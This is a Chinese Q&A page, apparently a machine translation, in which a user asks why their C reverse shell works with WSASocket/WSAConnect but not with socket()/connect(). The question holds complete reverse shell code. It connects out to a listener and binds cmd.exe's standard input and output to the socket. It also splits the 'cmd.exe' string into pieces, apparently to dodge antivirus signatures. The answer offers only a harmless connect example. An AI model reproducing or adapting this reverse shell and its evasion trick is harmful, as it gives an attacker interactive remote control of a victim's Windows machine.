为什么WSAConnect正常工作并connect();不是吗?

问题描述 投票:0回答:1

我正在用C / C ++尝试一些反向shell代码。 IT工作正常,但仅当我使用WSAConnectWSASocket时才可以。如果我使用socket();connect();,它不起作用吗?为什么会这样?

我总是用connect();代替WSAConnect,用socket();代替WSASocket。我知道我缺少什么。 

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

WSADATA wsa;
SOCKET sock;
struct sockaddr_in server;
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;


int main(int argc, char *argv[]) 
{
    WSAStartup(MAKEWORD(2,2), &wsa);
    // sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); This also doesn't work
    sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);


    server.sin_family = AF_INET;
    server.sin_port = htons(4942);
    server.sin_addr.s_addr =inet_addr("127.0.0.1");

    // connect(sock, (struct sockaddr*)&server, sizeof(server)); This doesn't work
    WSAConnect(sock,(SOCKADDR*)&server, sizeof(server),NULL,NULL,NULL,NULL);
    if (WSAGetLastError() == 0) {

        memset(&sinfo, 0, sizeof(sinfo));

        sinfo.cb=sizeof(sinfo);
        sinfo.dwFlags=STARTF_USESTDHANDLES;
        sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock;

        char *myArray[4] = { "cm", "d.e", "x", "e" };
        char command[8] = "";
        snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
        exit(0);
    } else {
        exit(0);
    }    
}
c++ winsock
1个回答
0
投票

您的代码是C语言而不是C ++语言,因此您的标签已关闭。此外,Microsoft在其文档inet_addr中声明已弃用,而您应该使用也支持ipv6地址的getaddrinfo。这将正确连接。

#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    WSADATA data = { 0 };
    WSAStartup(MAKEWORD(2, 2), &data);
    struct addrinfo src = { 0 };
    src.ai_protocol = IPPROTO_TCP;
    src.ai_socktype = SOCK_STREAM; 
    struct addrinfo* dst = NULL;
    if (getaddrinfo("127.0.0.1", "4942", &src, &dst)) {
        WSACleanup();
        return -1;
    }
    SOCKET connection = socket(dst->ai_family, dst->ai_socktype, dst->ai_protocol);
    if (connection == -1) {
        freeaddrinfo(dst);
        WSACleanup();
        return -1;
    }
    if (!connect(connection, dst->ai_addr, dst->ai_addrlen)) {
        printf("Connected\n");
    }
    else {
        printf("Failed to connect\n");
    }

    freeaddrinfo(dst);
    closesocket(connection);
    WSACleanup();
    return 0;
}

您可以比我做得更好一些,例如创建一个单独的函数并传递一个开放式手柄的结构。

最新问题
© www.soinside.com 2019 - 2024. All rights reserved.